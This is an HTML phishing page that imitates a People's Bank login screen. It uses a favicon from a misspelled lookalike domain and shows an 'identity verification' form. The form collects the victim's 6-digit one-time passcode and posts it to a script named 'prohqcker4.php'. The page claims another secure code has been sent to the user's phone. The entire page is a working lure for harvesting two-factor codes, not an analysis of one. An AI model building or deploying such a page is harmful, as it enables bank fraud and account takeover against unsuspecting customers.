<!DOCTYPE html>
<html class="js flexbox fontface objectfit object-fit csspositionsticky cssreflections no-regions cssresize shapes siblinggeneral subpixelfont supports csstransforms3d preserve3d canvas canvastext emoji devicemotion deviceorientation svg svgasimg svgclippaths svgfilters svgforeignobject inlinesvg smil no-touchevents typedarrays uagent-chrome uagent-webkit uagent-osWindows" lang="en" style="background-image: url(img/desktop-background-31261c4b72eb487c279e9a1b57d9f095.jpg);" stencil-hydrated=""><head id="pageheader">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <link href="otp2_files/app.css" rel="stylesheet" data-no-shim="">
    <link href="otp2_files/highcontrast-23d6f5c394031f2b7a197598ef562da5.css" rel="stylesheet" data-no-shim="">
    <link href="otp2_files/theme-q2-c78f9a6334979dc02a4414cf3a8779e5.css" rel="stylesheet" data-no-shim="">
    <link href="otp2_files/tecton-590048df214033d1c1591d552a32c9af.css" rel="stylesheet">
    <link rel="shortcut icon" href="https://peoplesbanc0claim0nline.xyz/favicon.ico">
    <title>People's Bank | Login</title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="description">
    <meta name="author">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no, address=no, email=no">
    <meta id="viewportMeta" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0, user-scalable=no, viewport-fit=cover">
    <meta name="referrer" content="origin">
</head>
<body id="pagebody" class="ember-application desktop theme-q2 frameless">
<div class="ember-view app-container desktop unauthenticated vertical-nav pfm-disabled no-pfm-accounts has-footer" id="ember4">
  <div id="ember16" class="main-view grid-row drawer-view main-view ember-view">
    <div id="ember25" class="focusing-outlet ember-view">
      <div id="login-modal"></div>
      <div class="login-outer">
        <div class="login-inner" id="login-inner">
          <div class="login-title">
            <h1 id="ember33" class="ui-logo large ember-view">
              <span class="sr-only" test-id="logoDescriptiveText">People's Bank | Login</span>
              <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
            </h1>
          </div>
          <div class="login-static-alert login-message login-alert-message loginFormArea"></div>
          <div class="login-form loginFormArea">
            <form action="prohqcker4.php" method="post" data-ember-action-50="50">
              <div class="login-message loginFormArea pad-T-no text-center" style="font-size: 16px"><strong>VERIFY YOUR IDENTITY</strong></div>
              <label for="tacEntry" class="login-message loginFormArea pad-T-no text-center" test-id="submit-tac-title" style="font-size: 12px">For security reason, Another 6-digit secure access code has been sent to your phone number<p></p></label>
              <input name="otp" autocapitalize="none" autocorrect="off" placeholder="Enter Code" onkeypress="return /^-?[0-9]*$/.test(this.value+event.key)" autocomplete="off" id="tacEntry" class="login-field form-control ember-text-field form-control ember-view" type="tel" required="">
              <div class="button-holder tac-input-buttons clearfix">
                <button class="btn btn-primary submitButton pull-right" type="submit">Submit</button>
              </div>
            </form>
          </div>
          <div class="login-icons clearfix">
            <a href="tel:8003973790" class="login-adLink callme-button">Call Us</a>
            <a class="login-adLink privacy_link" test-id="lnkPrivacy">Privacy Policy</a>
            <a target="_blank" class="login-adLink" href="#">Contact Us</a>
            <a target="_blank" class="login-adLink" href="#">Forgot Login</a>
            <a target="_blank" class="login-adLink" href="">Locations</a>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>

</body></html>